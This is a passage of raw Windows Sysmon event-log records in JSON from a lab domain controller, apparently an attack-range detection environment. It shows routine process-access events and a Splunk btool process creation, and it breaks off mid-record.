{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3210,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3211,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3212,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3213,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3214,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3215,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3216,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3217,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-001014590500}\r\nTargetProcessId: 4824\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-001014590500}","TargetProcessId":"4824","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3218,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.697\r\nProcessGuid: {E2A3D6B1-10FF-5F25-0000-0010D7590500}\r\nProcessId: 4840\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: 